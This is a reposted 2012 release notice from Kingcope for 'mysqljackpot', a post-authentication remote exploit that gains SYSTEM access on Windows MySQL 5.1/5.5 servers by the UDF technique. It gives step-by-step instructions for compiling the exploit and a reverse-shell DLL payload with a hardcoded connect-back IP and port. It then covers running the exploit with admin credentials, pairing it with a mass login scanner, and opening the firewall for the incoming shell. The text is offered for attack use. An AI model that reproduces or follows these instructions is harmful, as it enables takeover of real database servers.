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MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
来源:vfocus.net 作者:Kingcope 发布时间:2012-12-03  

Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.

Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope


Installation Instructions

1. Install mysql client libraries and headers (UNIX)
RedHat based (e.g. CentOS):
yum install mysql mysql-devel

2. Compile the standalone exploit
issue commands:
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

3. Compile the reverse shell payload (this is required!)
required because the connect back ip and port are hardcoded in the dll:
use mingw on windows or wine
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
to change the port in mysqljackpot.c too (default port: 443).
issue commands:
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
copy the payload.dll into the mysqljackpot exploit folder

4. Run The Exploit
./mysqljackpot -u root -p "" -t
A valid database admin user and his password are required
for the exploit to work properly.
This exploit is especially useful when used in connection
to a MySQL login scanner, see scanner/README.mysql inside this package.
Be sure to have the firewall open on the desired reverse port
on the attacking machine.

5. Enjoy your SYSTEM Shell!!!

Yours Sincerely,

-- Kingcope

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